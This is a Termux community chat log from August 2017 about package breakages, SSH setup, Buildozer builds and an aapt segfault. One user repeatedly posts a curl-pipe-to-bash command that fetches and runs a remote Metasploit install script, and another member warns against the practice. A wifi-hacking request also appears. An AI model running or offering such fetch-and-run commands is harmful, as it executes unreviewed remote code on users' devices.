2017-08-15 18:13:00 gitter (cocodevienne) Yeah but then again, they DO provide a service of sorts.🤔
2017-08-15 18:13:14 gitter (cocodevienne) Oh I am, I am.
2017-08-15 18:13:27 sdrausty simple issue, ls
2017-08-15 18:13:30 gitter (cocodevienne) Take MC for instance…
2017-08-15 18:13:41 gitter (cocodevienne) they must be filthy rich by now.
2017-08-15 18:13:44 gitter (cocodevienne) @sdrausty
2017-08-15 18:14:03 sdrausty but not at https://dl.google.com/android/
2017-08-15 18:14:17 sdrausty 404. That’s an error.
2017-08-15 18:14:17 sdrausty That’s all we know.
2017-08-15 18:15:17 gitter (cocodevienne) ?
2017-08-15 18:16:21 sdrausty Where is the list of files (.jar && .arr) to build Android APKs?
2017-08-15 18:16:46 sdrausty I want the listing of SDKs NDKs and whatever else can be downloaded from https://dl.google.com/android/
2017-08-15 18:16:58 sdrausty Where is it?
2017-08-15 18:17:44 sdrausty Well, it’s in https://dl.google.com/android/repository/repository-12.xml of sorts…
2017-08-15 18:19:19 sdrausty And in https://dl-ssl.google.com/android/repository/addons_list-3.xml MAYBE
2017-08-15 18:20:18 sdrausty Where the hell is the table of contents (listing) for https://dl.google.com/android/ ?
2017-08-15 18:21:21 gitter (cocodevienne) no I think its something like
2017-08-15 18:21:43 gitter (cocodevienne) http://dl.google.com/android/tools/sdk
2017-08-15 18:21:49 gitter (cocodevienne) something like that.
2017-08-15 18:23:33 gitter (sdrausty) 404. That’s an error.
2017-08-15 18:23:33 gitter (sdrausty)
2017-08-15 18:23:33 gitter (sdrausty) That’s all we know
2017-08-15 18:23:43 gitter (sdrausty) 404
2017-08-15 18:24:59 gitter (sdrausty) Listing, as in http://termux.net/dists/stable/main/binary-all/Packages.xz
2017-08-15 18:25:58 gitter (sdrausty) Listing, as in http://ftp.be.debian.org/debian/ls-lR.gz
2017-08-15 18:26:27 gitter (sdrausty) Listing, as in http://ftp.be.debian.org/debian/
2017-08-15 18:26:36 gitter (sdrausty) FILE LISTING
2017-08-15 18:27:20 gitter (sdrausty) I keep hearing over and over, “Why is this so difficult?”
2017-08-15 18:27:38 gitter (cocodevienne) https://dl.google.com/dl/android/studio/ide-zips/2.3.3.0/android-studio-ide-162.4069837-linux.zip
2017-08-15 18:27:42 gitter (sdrausty) With no listing it will be very very difficult.
2017-08-15 18:27:45 gitter (cocodevienne) for instance
2017-08-15 18:28:45 gitter (sdrausty) That is a long long download @cocodevienne not a listing.
2017-08-15 18:28:58 gitter (cocodevienne) Anyways Immq sleep tomorrow, got a race coming up w/ my dad so everybody sleep well and good night! @sdrausty @rods-tab3
2017-08-15 18:29:11 gitter (cocodevienne) Ya idk, thought maybe that would help.
2017-08-15 18:29:18 gitter (cocodevienne) I think google doesnt allow it.
2017-08-15 18:29:27 gitter (sdrausty) Good 🌃 night @cocodevienne
2017-08-15 18:29:27 gitter (cocodevienne) for whatever reason.
2017-08-15 18:29:47 gitter (cocodevienne) Thx.
2017-08-15 19:13:55 damnssh hi guys can someone help me with openssh?
2017-08-15 19:14:26 damnssh cant connect to putty using this tutorial https://oliverse.ch/tech/2015/11/06/run-an-ssh-server-on-your-android-with-termux.html
2017-08-15 19:19:57 damnssh hi?
2017-08-15 19:26:47 gitter (Grimler91) Hi,
2017-08-15 19:27:10 gitter (Grimler91) What did you run and what was the error?
2017-08-15 19:29:03 damnssh my problem is that i cant connect to android using putty
2017-08-15 19:29:27 damnssh no supported authentication methods available
2017-08-15 19:30:37 damnssh i mean , it does connect, but when i press enter to log in (blank) and it gives me no supported authentication methods available (server sent publickey ,keyboard-interactive)
2017-08-15 19:32:28 gitter (Grimler91) Ah yes, you need to copy your id_rsa.pub file from putty computer and add it to ~/.ssh/authorized_hosts
2017-08-15 19:32:46 gitter (Grimler91) Termux doesn’t support password authentication
2017-08-15 19:33:34 gitter (sdrausty) https://termux.com/ssh.html
2017-08-15 19:34:25 damnssh u mean i need to generate the key from putty? download putty gen
2017-08-15 19:38:07 BrainDamage yes
2017-08-15 19:41:25 damnssh damn i knew i read something wrong , mybad sorry for wasting ur time
2017-08-15 21:26:46 sdrausty Use ssh-keygen to generate a new one if desired.
2017-08-15 22:29:48 gitter (Auxilus) Ty @cocodevienne, send me repo link
2017-08-15 23:52:07 AmR | EiSa Did termux have port for dmidecode ? |
2017-08-16 02:26:04 kr1shna does the apps which explicit
2017-08-16 02:27:09 kr1shna …. depend on gtk3 cannot be installed on termux ?
2017-08-16 06:42:09 gitter (masterkorp) Hello everyone
2017-08-16 08:27:03 gitter (suryapoo) Cant connect with mysqli_connect to Mariadb..guys help
2017-08-16 08:55:16 deepakbndeepu Need links to vim-python pkg documentation
2017-08-16 09:54:05 gitter (masterkorp) Guys, which version of grep its packed on termux? I can’t seem to be able to user grep –perl-regexp
2017-08-16 09:55:18 frumpylava @masterkorp Busybox grep is default. Install Gnu grep with pkg install grep
2017-08-16 09:56:49 gitter (cocodevienne) How about running man vim-python
?
2017-08-16 09:57:41 gitter (cocodevienne) If you haven’t done apt update && apt install man
, then you should before running the above command.
2017-08-16 09:57:46 gitter (cocodevienne) @deepakbndeepu
2017-08-16 09:59:33 gitter (masterkorp) frumpylava: thank you
2017-08-16 10:02:17 deepakbndeepu gitter: nope, there is no man page for that 😞
2017-08-16 10:03:21 gitter (cocodevienne) Then I’d suggest you google it!:)
2017-08-16 10:04:21 gitter (cocodevienne) Search for something like Vim-Python docs
.
2017-08-16 10:04:26 gitter (cocodevienne) @deepakbndeepu
2017-08-16 10:05:21 deepakbndeepu gitter: done that too 😞
2017-08-16 10:05:33 gitter (cocodevienne) @frumpylava Where’s the video of your talk btw? Would have loved to come, I just had end-of-year exams.
2017-08-16 10:06:13 frumpylava @cocodevienne https://media.ccc.de/v/zeteco-59-termux_als_betriebssystem
2017-08-16 10:06:29 frumpylava @cocodevienne but it isn’t subtitled yet.
2017-08-16 10:07:39 sdrausty frumpylava: ffmpeg has a subtitle option in Termux
2017-08-16 10:08:44 gitter (cocodevienne) Then I am sorry, I do not know! Maybe @vishalbiswas can help? @deepakbndeepu
2017-08-16 10:09:08 gitter (cocodevienne) That’s no problem, after all I am from Austria!:)
2017-08-16 10:09:19 gitter (cocodevienne) @frumpylava
2017-08-16 10:09:29 sdrausty man ffmpeg
2017-08-16 10:10:14 deepakbndeepu gitter: ok
2017-08-16 10:14:44 sdrausty frumpylava: https://t.co/dBjttLxCgr was made with ffmpeg in Termux on device.
2017-08-16 10:16:17 endre nice
2017-08-16 10:16:20 frumpylava @sdrausty are you currently in antarctica?
2017-08-16 10:17:43 sdrausty frumpylava: The movie was made from webcam there https://www.usap.gov/videoclipsandmaps/SouthPoleWebcam/Pal00100.jpg on a smartphone
2017-08-16 10:18:35 sdrausty frumpylava: no I am not in Antarctica lol
2017-08-16 10:20:18 gitter (cocodevienne) Ah yes btw
2017-08-16 10:20:22 sdrausty https://www.usap.gov/videoclipsandmaps/spwebcam.cfm
2017-08-16 10:20:23 gitter (cocodevienne) @sdrausty
2017-08-16 10:20:32 sdrausty yes
2017-08-16 10:20:34 gitter (cocodevienne) I made like a donation app;)
2017-08-16 10:20:40 gitter (cocodevienne) For 350 bucks
2017-08-16 10:20:42 sdrausty great!
2017-08-16 10:20:46 sdrausty wow
2017-08-16 10:21:02 gitter (cocodevienne) one of the most expensive in the stor
2017-08-16 10:21:04 gitter (cocodevienne) *store
2017-08-16 10:21:08 sdrausty is it at play
2017-08-16 10:21:25 sdrausty what is the link?
2017-08-16 10:21:31 gitter (cocodevienne) I haven’t released it officially. But because you were talking about it.
2017-08-16 10:21:33 gitter (cocodevienne) hang on
2017-08-16 10:22:00 gitter (cocodevienne) https://play.google.com/store/apps/details?id=com.voxbyletigre.voxclock
2017-08-16 10:22:26 gitter (cocodevienne) I’ve decided to make a mix between oss and commercial.
2017-08-16 10:22:49 gitter (cocodevienne) @sdrausty
2017-08-16 10:24:53 sdrausty wayy *way
2017-08-16 10:25:12 sdrausty good luck
2017-08-16 10:25:23 frumpylava @cocodevienne Why do you need storage permissions for a simple clock app?
2017-08-16 10:25:35 gitter (cocodevienne) Default for kivy…
2017-08-16 10:25:38 gitter (cocodevienne) No idea.
2017-08-16 10:26:10 gitter (cocodevienne) Did you download it???
2017-08-16 10:26:15 gitter (cocodevienne) @sdrausty
2017-08-16 10:26:19 sdrausty no
2017-08-16 10:27:26 sdrausty What is the most expensive app on play?
2017-08-16 10:32:53 sdrausty I want the listing of SDKs NDKs and whatever else can be downloaded from https://dl.google.com/android/
2017-08-16 10:34:21 sdrausty Where is it? I want it for https://github.com/sdrausty/buildAPKs/issues/3 Gradle Builds Usually Fail Using buildAPKs.
2017-08-16 10:36:02 sdrausty @cocodeveinne Non of the clocks at https://github.com/sdrausty/buildAPKsClocks require advanced permissions.
2017-08-16 10:43:20 sdrausty cd && git clone https://github.com/sdrausty/buildAPKs
2017-08-16 10:43:21 sdrausty ./buildAPKs/scripts/build/buildClocks.sh
2017-08-16 11:07:40 sdrausty Non *None
2017-08-16 11:12:13 gitter (cocodevienne) I’m not sure actually! I just used buildozer android release and that was it.
2017-08-16 11:12:27 gitter (cocodevienne) You’d have to check out the source of Buildozer I expect.
2017-08-16 11:12:37 gitter (cocodevienne) Sorry!:( @sdrausty
2017-08-16 11:13:04 u0_a93 ltnx
2017-08-16 11:26:49 sdrausty cocodevienne: link to buildozer please.
2017-08-16 11:37:08 gitter (cocodevienne) sufe
2017-08-16 11:37:10 gitter (cocodevienne) *sure
2017-08-16 11:37:20 gitter (cocodevienne) http://github.com/kivy/buildozer
2017-08-16 11:38:47 sdrausty tnx
2017-08-16 11:54:01 gitter (cocodevienne) Any questions, just ask.
2017-08-16 11:56:30 gitter (cocodevienne) I think the broad gist is this: Buildozer analyzes Python code(imports and so forth) -> converts it to C code using Cython and finally -> compiles C code into Java code or .dex
files using the SDK and NDK. Buildozer is just a mask, if you will for Python for Android and any options or preferences you want to set are done via a buildozer.spec
file that is basically just CLI optiona for Python for Android.
2017-08-16 11:56:32 gitter (cocodevienne) Got it?
2017-08-16 11:56:38 gitter (cocodevienne) @sdrausty
2017-08-16 11:56:57 gitter (cocodevienne) *options
2017-08-16 11:57:24 gitter (cocodevienne) DO NOT under any circumstances try to use buildozer -v android release
2017-08-16 11:57:29 gitter (cocodevienne) !!
2017-08-16 12:18:37 gitter (sdrausty) Why?
2017-08-16 13:06:37 gitter (suryapoo) Php has support for MySQL in termux??
2017-08-16 13:08:23 gitter (vishalbiswas) @suryapoo not yet
2017-08-16 13:08:57 gitter (vishalbiswas) https://github.com/termux/termux-packages/pull/1025
2017-08-16 13:11:53 gitter (cocodevienne) Because its difficult af. I had to struggle and find a workaround.
2017-08-16 13:12:02 gitter (cocodevienne) I did eventually.
2017-08-16 13:13:37 gitter (cocodevienne) You would need to generate a keystore and the fiddle around with some Env Vars and then do it all in a certain chronological order in order for the compilation to be successful. I made it work somehow. Don’t ask how it all works with the keystores and the Env Vars, I really do not know. @sdrausty
2017-08-16 13:19:11 gitter (suryapoo) Thanks… @vishalbiswas
2017-08-16 13:27:06 gitter (cocodevienne) *then
2017-08-16 13:30:54 sdrausty cocodevienne: tnx
2017-08-16 13:31:45 gitter (cocodevienne) No problem!
2017-08-16 13:32:32 gitter (cocodevienne) If you want instructions for release builds, first build a debug APK and DO NOT delete the .buildozer
folder!!
2017-08-16 13:33:00 gitter (cocodevienne) And confirm that the debug build works as it should.
2017-08-16 13:33:01 gitter (cocodevienne) @sdrausty
2017-08-16 13:33:02 gitter (cocodevienne) hang on
2017-08-16 20:49:49 Church- Any chance for a port of rtv?
2017-08-16 20:50:01 Church- Hmm. Might be able to do this myself, it is just python.
2017-08-16 21:42:22 live_the_dream Church-: pip install rtv
2017-08-16 21:55:34 Church- …
2017-08-16 21:55:39 Church- I’m a moron at times.
2017-08-16 22:02:28 live_the_dream everyone is
2017-08-16 22:03:27 live_the_dream for instance it appears recent updates broke python because of libandroid-support update
2017-08-16 22:04:00 live_the_dream no libintl.so ..
2017-08-16 22:11:32 live_the_dream @fornwall everything linked to libintl,so is now not working.
2017-08-17 00:07:30 gitter (Ashish882) Hi
2017-08-17 00:08:11 gitter (Ashish882) How to hack wifi with termux is it possible to hack WiFi with termux plz.reply
2017-08-17 00:18:20 gitter (Ashish882) With airmon-ng
2017-08-17 00:31:49 live_the_dream no
2017-08-17 00:31:51 live_the_dream ks
2017-08-17 00:32:05 live_the_dream need root + needs specific drivera
2017-08-17 00:34:38 gitter (Ashish882) How
2017-08-17 01:20:12 live_the_dream frumpylava: wake up
2017-08-17 01:22:50 frumpylava live_the_dream: what?
2017-08-17 01:23:18 live_the_dream is ajything that links to libintl broken?
2017-08-17 01:23:54 frumpylava Seems so. Python is, at least.
2017-08-17 01:25:13 frumpylava What else would link to it?
2017-08-17 01:25:30 live_the_dream neovim gnutls
2017-08-17 01:25:33 live_the_dream elfutils
2017-08-17 01:26:00 frumpylava live_the_dream: oh yeah. also broken.
2017-08-17 01:26:21 live_the_dream binutils >
2017-08-17 01:26:33 live_the_dream no
2017-08-17 01:28:44 live_the_dream and sharutilsu
2017-08-17 01:30:07 live_the_dream so elfutils neovim python python2 and libgnutls
2017-08-17 01:33:57 frumpylava python2 works for me.
2017-08-17 01:35:23 live_the_dream ok
2017-08-17 01:35:42 frumpylava ffmpeg is also broken
2017-08-17 01:35:44 gitter (marvin-littlewood) @fornwall - same here: after latest update to libandroid-support & dev - emacs reports: CANNOT LINK EXECUTABLE DEPENDENCIES: library “libintl.so” not found
2017-08-17 01:38:41 live_the_dream yeah emacs doesn’t link against libintl.so directtly but it might need those functions that are now inlined..
2017-08-17 01:40:41 live_the_dream its on these occastions i wish one of us had energency ph call but i guess its nit that big of a deal
2017-08-17 01:40:58 live_the_dream not like medical equipment just shut down right?
2017-08-17 01:41:03 frumpylava I opened an etherpad here: https://pads.ccc-ch.ch/public_pad/libintl.so, so we can collect all broken things.
2017-08-17 01:43:10 frumpylava live_the_dream: I really wish we had a “testing”-repo.
2017-08-17 01:43:23 live_the_dream same
2017-08-17 01:47:50 gitter (Ashish882) Abybudy tell me to install airmon-ng in termux
2017-08-17 01:48:22 frumpylava live_the_dream: all programs ffmpeg are broke: bs1770gain, mpv, mpd
2017-08-17 01:53:28 zexa gitter: https://github.com/termux/termux-packages/issues/371
2017-08-17 01:54:52 frumpylava ^ @Ashish882
2017-08-17 02:02:44 frumpylava live_the_dream: However your workaround seems to work for all of them.
2017-08-17 02:02:58 live_the_dream made a mistake think bimutils is fine
2017-08-17 02:04:01 zexa Anyone here used mosh before?
2017-08-17 02:04:17 live_the_dream yep
2017-08-17 02:04:17 frumpylava zexa: yes. what of it?
2017-08-17 02:05:09 zexa Particularly the mosh chrome client. When i use the ssh mode to connect to my termux device, does it use the mosh protocol or the ssh one? or are they the same thing?
2017-08-17 02:05:35 live_the_dream ssh one first to auth
2017-08-17 02:05:48 live_the_dream then moves over to udp 60001
2017-08-17 02:05:52 gitter (Ashish882) Thanks I check
2017-08-17 02:06:18 zexa live_the_dream: IC, thanks.
2017-08-17 02:06:39 live_the_dream needs 1 udp port per client
2017-08-17 02:06:54 frumpylava 60001-60999
2017-08-17 02:07:44 gitter (Ashish882) It mean it is not possible.in termux
2017-08-17 02:09:06 zexa Any ways to decrease the lag? My mosh client still gets periodic freezes of 10-15s. Even with termux-wake-lock
2017-08-17 02:09:48 frumpylava zexa: are you connecting to or from termux?
2017-08-17 02:10:00 zexa to
2017-08-17 02:10:17 frumpylava zexa: What device do you have?
2017-08-17 02:10:36 zexa Samsung Note 4
2017-08-17 02:10:36 live_the_dream only way to fix that is to fidfle wirh kernel cpufreq stuff
2017-08-17 02:12:06 frumpylava hmm… On some devices the wifi chip goes to sleep when nothing is downloading, this causes apps like ssh and mosh to lag at incoming connections.
2017-08-17 02:12:40 live_the_dream ahh
2017-08-17 02:13:08 live_the_dream disable wifi optimizarion?
2017-08-17 02:13:14 frumpylava The only workaround I have found is connecting to android via usb instead of wifi. https://glow.li/technology/2016/09/20/access-termux-via-usb.html
2017-08-17 02:13:22 frumpylava live_the_dream: Hasn’t helped in my case.
2017-08-17 02:13:29 live_the_dream darn
2017-08-17 02:14:21 zexa frumpylava: and that’s not even an option in my case, as I’m not comfortable connecting my phone to work computers…
2017-08-17 02:17:07 live_the_dream yeah android and most phones have binary blobs such that its highly likely that its insecure. but that is most likely people at international business spy kevek stuff
2017-08-17 02:17:47 live_the_dream since you wouod need telecom level or google level access …
2017-08-17 02:19:35 live_the_dream not likely
2017-08-17 02:20:25 live_the_dream but local level stuff on phone is another matter i guess
2017-08-17 05:14:18 fornwall all packages linking against libintl.so has been rebuilt and fixed now, sorry for the trouble!
2017-08-17 05:16:33 gitter (cocodevienne) @fornwall what about my question earlier?:)
2017-08-17 05:20:08 frumpylava fornwall: That’s great. everything seems to work again.
2017-08-17 05:27:34 gitter (fornwall) @cocodevienne sorry, what question?
2017-08-17 05:30:38 gitter (cocodevienne) How did you promote Termux right at the beginning? Because I am struggling…
2017-08-17 05:30:43 gitter (cocodevienne) @fornwall
2017-08-17 05:31:42 frumpylava @cocodevienne are you struggling promoting your 350$ App?
2017-08-17 05:32:42 gitter (cocodevienne) lol no the other one for 3,59;)
2017-08-17 05:32:55 gitter (cocodevienne) @frumpylava
2017-08-17 05:43:20 gitter (fornwall) @cocodevienne posted on some forums mostly. I think you should start with a free app, it’s a lot easer to get people to install and give feedback on a free app, and you probably need a lot of feedback when starting out
2017-08-17 05:47:25 gitter (fornwall) since a couple of days ago the termux apt repo uses Acquire-By-Hash: yes
as described in https://www.chiark.greenend.org.uk/~cjwatson/blog/no-more-hash-sum-mismatch-errors.html, so hopefully the Hash Sum Mismatch
problem that have affected people over time due to http caching issues should be gone
2017-08-17 05:48:10 gitter (fornwall) basically, it avoids http caching issues and race conditions by using a new url for each new revision of the package index
2017-08-17 05:50:45 gitter (cocodevienne) Oh that sounds good! @fornwall
2017-08-17 05:51:21 gitter (cocodevienne) I want to know more, unfortunately my phone is empty after running for two days straight but I’ll get back here to you as soon as I have some juice!
2017-08-17 05:51:31 gitter (cocodevienne) Thx for now!!! I really appreciate it!
2017-08-17 06:05:30 frumpylava oh. I have to rebootstrap all my virtualenvs.
2017-08-17 06:43:43 gitter (cocodevienne) https://pastebin.com/kgYeTPYB
2017-08-17 06:43:56 gitter (cocodevienne) This is for you @sdrausty!
2017-08-17 06:44:45 gitter (cocodevienne) You can use this simple Hello World app to test out the work you are doing for Buildozer!
2017-08-17 06:44:45 gitter (cocodevienne) If you are still doing it.
2017-08-17 06:44:56 gitter (cocodevienne) I wanted to send it to you yesterday but then I had to meet a friend.
2017-08-17 06:45:07 gitter (cocodevienne) Anyways, now you have it!
2017-08-17 06:47:27 gitter (cocodevienne) https://pastebin.com/YQcu7rys
2017-08-17 06:48:02 gitter (cocodevienne) And here is a buildozer.spec
you could use!
2017-08-17 06:52:13 gitter (cocodevienne) Bu you said something about forums? @fornwall Which ones for instance?
2017-08-17 08:38:05 u0_a149 hi all
2017-08-17 08:39:52 u0_a149 got any termux tips
2017-08-17 08:40:40 u0_a149 voce
2017-08-17 08:40:47 u0_a149 voice
2017-08-17 08:43:14 zexa this is more of a IRC than termux tip but
2017-08-17 08:43:14 zexa change your username u0_a149
2017-08-17 08:45:46 u0_a149 ffiniset nitoset bi
2017-08-17 09:01:34 gitter (Auxilus) @vishalbiswas i am forcing to install Metasploit - 4.14.21
2017-08-17 09:05:23 gitter (Auxilus) –2017-08-17 18:34:45– https://github.com/Auxilus/Auxilus.github.io/4.14.21.zip Resolving github.com… 192.30.253.112, 192.30.253.113 Connecting to github.com | 192.30.253.112 | :443… connected. HTTP request sent, awaiting response… 404 Not Found 2017-08-17 18:34:46 ERROR 404: Not Found. unzip: cannot f |
2017-08-17 09:05:23 gitter 4.14.21.zip.zip or 4.14.21.zip.ZIP. mv: cannot stat ‘metasploit-framework-4.14.21’: No such file or directory bash: line 18: cd: metasploit-framework: No such file or directory
2017-08-17 09:08:55 gitter (Auxilus) Can anyone try out the script?
2017-08-17 09:09:44 gitter (Auxilus) Just execute cd $HOME & & curl -L https://Auxilus.github.io/metasploit.sh | bash
2017-08-17 09:09:50 gitter (Auxilus) Sry
2017-08-17 09:10:02 gitter (Auxilus) Just exec `cd $HOME
2017-08-17 09:10:02 gitter (Auxilus) curl -L https://Auxilus.github.io/metasploit.sh | bash` |
2017-08-17 09:12:21 gitter (cocodevienne) Tried it
2017-08-17 09:12:25 gitter (cocodevienne) doesn’t work!:(
2017-08-17 09:12:29 gitter (cocodevienne) @Auxilus
2017-08-17 09:12:57 gitter (Auxilus) Whats the error?
2017-08-17 09:13:29 gitter (Auxilus) Do you have metasploit-framework installed?
2017-08-17 09:13:43 gitter (cocodevienne) It aborted while installing the prerequisites.
2017-08-17 09:13:45 gitter (cocodevienne) Nope
2017-08-17 09:13:47 gitter (cocodevienne) .
2017-08-17 09:13:50 gitter (Auxilus) Uninstall it and then cd $HOME
2017-08-17 09:14:10 gitter (Auxilus) Then exec curl -L https://Auxilus.github.io/metasploit.sh | bash
2017-08-17 09:14:32 gitter (Auxilus) Let me know if its running…
2017-08-17 09:14:48 gitter (Auxilus) Btw is your repo up?
2017-08-17 09:17:25 gitter (Auxilus) @cocodevienne is it working?
2017-08-17 09:17:53 gitter (cocodevienne) What should I uninstall?
2017-08-17 09:18:16 gitter (cocodevienne) I’ve been working tirelessly on my apps but it’s all happening, don’t worry.
2017-08-17 09:18:18 gitter (cocodevienne) @Auxilus
2017-08-17 10:10:13 gitter (Auxilus) No man just run `
2017-08-17 10:10:33 gitter (Auxilus) @cocodevienne curl -L https://Auxilus.github.io/metasploit.sh | bash
2017-08-17 10:42:50 frumpylava @Auxilus don’t curl | bash. |
2017-08-17 10:42:52 frumpylava https://www.seancassidy.me/dont-pipe-to-your-shell.html
2017-08-17 10:43:04 frumpylava https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/
2017-08-17 11:01:00 gitter (Auxilus) Ok frumpylava
2017-08-17 11:17:14 gitter (Auxilus) I wanna start a torrent site, how do I do that?
2017-08-17 11:17:34 gitter (Auxilus) (more like tpb)
2017-08-17 11:20:50 BrainDamage you need to host a torrent tracker
2017-08-17 11:21:03 BrainDamage then write a search interface for it
2017-08-17 11:21:22 BrainDamage and allow people upload files
2017-08-17 12:48:51 specialkay hey
2017-08-17 13:52:49 gitter (Auxilus) Hey man ‘sup
2017-08-17 14:24:34 frumpylava @Auxilus, if you want to test on Termux I’ve found both Chihaya and pybtracker to work well. I’m using Chihaya to distribute torrents in local networks at hackerspaces.
2017-08-17 14:25:41 gitter (Auxilus) Is it sort of like private version of tpb?
2017-08-17 14:27:17 gitter (Auxilus) Ye sure, id like to test and use it…. I really wanna have some private torrent site for my friends
2017-08-17 14:30:31 frumpylava @Auxilus, No it’s just the trackers. No web frontend. I haven’t found a good easy solution for that. Let me know if you find something that does the web stuff
2017-08-17 14:31:11 gitter (Auxilus) There is openbay
2017-08-17 14:31:30 gitter (Auxilus) But looks like they shut down the project
2017-08-17 14:31:30 gitter (Auxilus) Its on git
2017-08-17 14:31:49 gitter (Auxilus) Not sure about frontend tho
2017-08-17 14:32:34 gitter (cocodevienne) You could use Jekyll maybe?
2017-08-17 14:33:54 gitter (Auxilus) @cocodevienne i heard a lot about it, but isnt it a blog creator?
2017-08-17 14:35:54 frumpylava @Auxilus Jekyll won’t do because it’s a static site. You can’t do a file upload with it.
2017-08-17 14:36:26 gitter (Auxilus) Ik,
2017-08-17 14:36:44 gitter (Auxilus) Do you have any php script to do file uploads?
2017-08-17 14:36:50 gitter (Auxilus) I cant find on google…
2017-08-17 14:37:44 frumpylava No. But it’s really easy to do yourself. Just a few lines of code. There arr plenty of tutorials.
2017-08-17 14:38:30 gitter (Auxilus) Ye, im seeing one on YT atm…
2017-08-17 15:07:58 sdrausty hello
2017-08-17 15:18:08 frumpylava @Auxilus I was also playing around with a ftp server. It just depends on how technologically adept your friends are.
2017-08-18 20:00:16 johnnymacs I’m trying to get myself into a sort of slackware situation where I can just compile away on make
2017-08-18 20:22:08 sdrausty Anyone else who can see if aapt:s segfaults for them?
2017-08-18 20:26:40 sdrausty the newest aapt after apt update && apt upgrade
Please back up you aapt*.deb before proceeding cp $PREFIX/var/cache/apt/archives/aapt*.deb /sdcard/Download/
2017-08-18 20:28:24 sdrausty cp $PREFIX/var/cache/apt/archives/aapt.deb /sdcard/Download/ * cp $PREFIX/var/cache/apt/archives/aapt*.deb /sdcard/Download/
2017-08-18 20:30:51 sdrausty Before upgrading you will probably want to backup aapt*.deb from your current version if you can. You msy copy it anywhere cp $PREFIX/var/cache/apt/archives/aapt*.deb /sdcard/Download/
is just a suggestion.
2017-08-18 20:31:09 sdrausty msy *may
2017-08-18 20:33:15 sdrausty If you find aapt seg faults please post at https://github.com/termux/termux-packages/issues/1287
2017-08-18 20:34:22 sdrausty Segmentation Fault in aapt
after Latest Update
2017-08-18 20:36:54 sdrausty The easiest way to reproduce this seg fault is:
2017-08-18 20:37:01 sdrausty cd && apt update && apt upgrade
2017-08-18 20:37:01 sdrausty apt install aapt apksigner dx ecj findutils git
2017-08-18 20:37:01 sdrausty git clone https://github.com/sdrausty/buildAPKs
2017-08-18 20:37:01 sdrausty ./buildAPKs/scripts/build/buildMyFirstAPK.sh
2017-08-18 20:38:44 fornwall sdrausty: hm strange, I’m unable to reproduce the aapt segfault, tested on both android 6 and android 7
2017-08-18 20:38:55 fornwall can you try a new build of the package and see if that makes a difference?
2017-08-18 20:38:58 fornwall rm -f a.deb && wget http://fornwall.net/a.deb && apt install –reinstall -y –allow-downgrades ./a.deb
2017-08-18 20:39:30 gitter (sdrausty) @fornwall tnx for your suggestion ‘bout findutils
⛵🚤🛳⚓☺
2017-08-18 20:42:09 sdrausty Tried it! Still seg fault
2017-08-18 20:42:42 sdrausty aapt/stable,now 7.0.0.14-3 aarch64 [installed]
2017-08-18 20:43:01 u0_a122 hi
2017-08-18 20:44:29 sdrausty It’s still the same version.
2017-08-18 20:44:43 sdrausty one momeent please
2017-08-18 20:44:54 sdrausty hi u0_a122
2017-08-18 20:45:45 sdrausty dpkg –purge aapt
2017-08-18 20:46:23 sdrausty $ wget http://fornwall.net/a.deb
2017-08-18 20:46:53 sdrausty dpkg –install a.deb
2017-08-18 20:47:12 sdrausty Setting up aapt (7.0.0.14-3) …
2017-08-18 20:47:34 sdrausty Segmentation fault
2017-08-18 20:47:55 fornwall right, the package was the same version, just rebuilt to see if it would make a difference
2017-08-18 20:48:01 sdrausty ok
2017-08-18 20:48:26 fornwall hm, interesting that I can’t reproduce it, would be informative to hear about others trying it out. anyone?
2017-08-18 20:48:31 sdrausty can you wget previuos version
2017-08-18 20:49:01 sdrausty the one I had before todays au
2017-08-18 20:49:57 sdrausty au
is a little sccript on $PATH apt update && apt upgrade
2017-08-18 20:51:20 sdrausty id like to dpkg it back on so https://sdrausty.github.io/buildAPKs builds again on device hopefully
2017-08-18 20:52:50 fornwall unfortunately old .deb files are not kept around
2017-08-18 20:53:04 fornwall but can you try a new tweaked build, and install http://fornwall.net/a.deb again?
2017-08-18 20:53:11 fornwall it should now say version 7.0.0.14-4
2017-08-18 20:53:21 sdrausty arg should’ave backed up
2017-08-18 20:53:44 sdrausty ok
2017-08-18 20:54:19 sdrausty Setting up aapt (7.0.0.14-3) …
2017-08-18 20:54:38 sdrausty t’s not -4
2017-08-18 20:56:17 sdrausty @fornwall Do you have any favorites from the collection @buildAPKs ?
2017-08-18 20:56:32 fornwall strange, can you try http://fornwall.net/a2.deb instead?
2017-08-18 20:57:25 fornwall I just tried it out for the first time now, haven’t looked into any particular app. but really impressive work having everything building!
2017-08-18 20:57:28 sdrausty I like a few of the
2017-08-18 20:57:36 sdrausty 0kb/s ?
2017-08-18 20:57:55 sdrausty eta 85+ min 2.7mb
2017-08-18 20:57:58 sdrausty ?
2017-08-18 20:59:15 sdrausty Setting up aapt (7.0.0.14-4) …
2017-08-18 20:59:57 sdrausty Install step2.apk from /sdcard/Download/ using your file manager from Android.
2017-08-18 20:59:57 sdrausty $
2017-08-18 21:00:00 sdrausty tnx
2017-08-18 21:00:28 fornwall that version doesn’t segfault for you?
2017-08-18 21:00:33 sdrausty aapt/now 7.0.0.14-4 aarch64 [installed,local]
2017-08-18 21:01:07 sdrausty correct it built moon let me check buildAll
2017-08-18 21:01:52 fornwall ok, that’s interesting!
2017-08-18 21:04:13 sdrausty building and depositting APKs as should be thank you @fornwall
2017-08-18 21:04:33 sdrausty yes it is interesting
2017-08-18 21:04:37 fornwall do you have the time to try out two more versions?
2017-08-18 21:05:02 fornwall http://fornwall.net/a-25.deb
2017-08-18 21:05:05 fornwall and
2017-08-18 21:05:10 fornwall http://fornwall.net/a-26.deb
2017-08-18 21:05:16 sdrausty im a little tired but sure of course itwill be my pleasure
2017-08-18 21:05:55 fornwall thanks! they should both be at version 7.1.2.33
2017-08-18 21:08:41 sdrausty 0kb/s
2017-08-18 21:09:13 fornwall hm, seems to be problem with the web host there. does it download eventually?
2017-08-18 21:11:02 sdrausty …
2017-08-18 21:11:41 sdrausty Setting up aapt (7.1.2.33) …
2017-08-18 21:11:46 sdrausty builds
2017-08-18 21:12:20 fornwall nice! is that a-25.deb?
2017-08-18 21:12:36 sdrausty a-26 builds too
2017-08-18 21:12:45 sdrausty both are OK
2017-08-18 21:13:28 sdrausty both have the same version both built moon
2017-08-18 21:15:23 sdrausty surprisingly I’m not as tired as I was. Actually now I feel full of energy!
2017-08-18 21:16:10 sdrausty I’ll be glad to help ‘bout screen garbage in weechat
2017-08-18 21:16:27 sdrausty just reappered onscreen btw
2017-08-18 21:18:16 sdrausty not to mention repetitive flickering ;)
